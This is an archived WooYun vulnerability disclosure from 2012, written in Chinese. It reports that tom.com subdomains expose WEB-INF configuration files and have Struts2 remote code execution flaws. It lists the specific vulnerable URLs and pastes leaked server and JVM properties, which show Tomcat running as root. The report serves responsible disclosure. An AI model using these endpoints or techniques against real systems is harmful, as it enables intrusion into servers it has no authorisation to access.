乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2012-10-24: 细节已通知厂商并且等待厂商处理中 2012-10-27: 厂商已经确认,细节仅向厂商公开 2012-11-06: 细节向核心白帽子及相关领域专家公开 2012-11-16: 细节向普通白帽子公开 2012-11-26: 细节向实习白帽子公开 2012-12-08: 细节向公众公开
RT!
首先看一个以前典型的case: WooYun: 去哪儿任意文件读取(基本可重构该系统原工程) 或哥这篇粗糙的文章:http://hi.baidu.com/shine%5F%C9%C1%C1%E9/blog/item/7d7d57445f523a4384352468.html
http://search.auto.tom.com/WEB-INF/web.xmlhttp://search.auto.tom.com/WEB-INF/classes/beans.xmlhttp://data.auto.tom.com/WEB-INF/classes/beans.xml
(抱歉!抱歉!发现前面上错图了,更正一下!)
附带两struts2远程代码执行漏洞:http://637.tom.com/login-share/logout/logout.actionhttp://englishok.tom.com/club/clubShow.action
/data/apache-tomcat-6.0.26/webapps/login-sharejava.home: /usr/local/jdk1.6.0_25/jrejava.version: 1.6.0_25os.name: Linuxos.arch: i386os.version: 2.6.32-5-686-bigmemuser.name: rootuser.home: /rootuser.dir: /data/apache-tomcat-6.0.26/binjava.class.version: 50.0java.class.path: /data/apache-tomcat-6.0.26/bin/bootstrap.jarjava.library.path: /usr/local/jdk1.6.0_25/jre/lib/i386/server:/usr/local/jdk1.6.0_25/jre/lib/i386:/usr/local/jdk1.6.0_25/jre/../lib/i386:/usr/java/packages/lib/i386:/lib:/usr/libfile.separator: /path.separator: :java.vendor: Sun Microsystems Inc.java.vendor.url: http://java.sun.com/java.vm.specification.version: 1.0java.vm.specification.vendor: Sun Microsystems Inc.java.vm.specification.name: Java Virtual Machine Specificationjava.vm.version: 20.0-b11java.vm.vendor: Sun Microsystems Inc.java.vm.name: Java HotSpot(TM) Server VMjava.specification.version: 1.6java.specification.vender: java.specification.name: Java Platform API Specificationjava.io.tmpdir: /data/apache-tomcat-6.0.26/temphibernate信息-- listing properties --java.runtime.name=Java(TM) SE Runtime Environmentsun.boot.library.path=/usr/local/jdk1.6.0_25/jre/lib/i386java.vm.version=20.0-b11shared.loader=java.vm.vendor=Sun Microsystems Inc.java.vendor.url=http://java.sun.com/path.separator=:java.vm.name=Java HotSpot(TM) Server VMtomcat.util.buf.StringCache.byte.enabled=truefile.encoding.pkg=sun.iojava.util.logging.config.file=/data/apache-tomcat-6.0.26/conf/loggi...user.country=USsun.java.launcher=SUN_STANDARDsun.os.patch.level=unknownjava.vm.specification.name=Java Virtual Machine Specificationuser.dir=/data/apache-tomcat-6.0.26/binjava.runtime.version=1.6.0_25-b06java.awt.graphicsenv=sun.awt.X11GraphicsEnvironmentjava.endorsed.dirs=/data/apache-tomcat-6.0.26/endorsedos.arch=i386java.io.tmpdir=/data/apache-tomcat-6.0.26/templine.separator=java.vm.specification.vendor=Sun Microsystems Inc.java.util.logging.manager=org.apache.juli.ClassLoaderLogManagerjava.naming.factory.url.pkgs=org.apache.namingos.name=Linuxsun.jnu.encoding=UTF-8java.library.path=/usr/local/jdk1.6.0_25/jre/lib/i386/s...java.specification.name=Java Platform API Specificationjava.class.version=50.0java.naming.provider.url=rmi://172.24.203.160:9199sun.management.compiler=HotSpot Tiered Compilersos.version=2.6.32-5-686-bigmemuser.home=/rootuser.timezone=Asia/Shanghaicatalina.useNaming=truejava.awt.printerjob=sun.print.PSPrinterJobjava.specification.version=1.6file.encoding=UTF-8catalina.home=/data/apache-tomcat-6.0.26user.name=rootjava.class.path=/data/apache-tomcat-6.0.26/bin/bootst...jboss.remoting.version=22hibernate.bytecode.use_reflection_optimizer=falsejava.naming.factory.initial=com.sun.jndi.rmi.registry.RegistryCon...package.definition=sun.,java.,org.apache.catalina.,org.a...java.vm.specification.version=1.0sun.arch.data.model=32java.home=/usr/local/jdk1.6.0_25/jresun.java.command=org.apache.catalina.startup.Bootstrap...java.specification.vendor=Sun Microsystems Inc.user.language=enjava.vm.info=mixed modejava.version=1.6.0_25java.ext.dirs=/usr/local/jdk1.6.0_25/jre/lib/ext:/u...sun.boot.class.path=/usr/local/jdk1.6.0_25/jre/lib/resour...java.vendor=Sun Microsystems Inc.server.loader=catalina.base=/data/apache-tomcat-6.0.26file.separator=/java.vendor.url.bug=http://java.sun.com/cgi-bin/bugreport...common.loader=${catalina.base}/lib,${catalina.base}...sun.cpu.endian=littlesun.io.unicode.encoding=UnicodeLittlepackage.access=sun.,org.apache.catalina.,org.apache....sun.cpu.isalist=
如上!
危害等级:中
漏洞Rank:7
确认时间:2012-10-27 08:36
添加对漏洞的补充说明以及做出评价的理由
暂无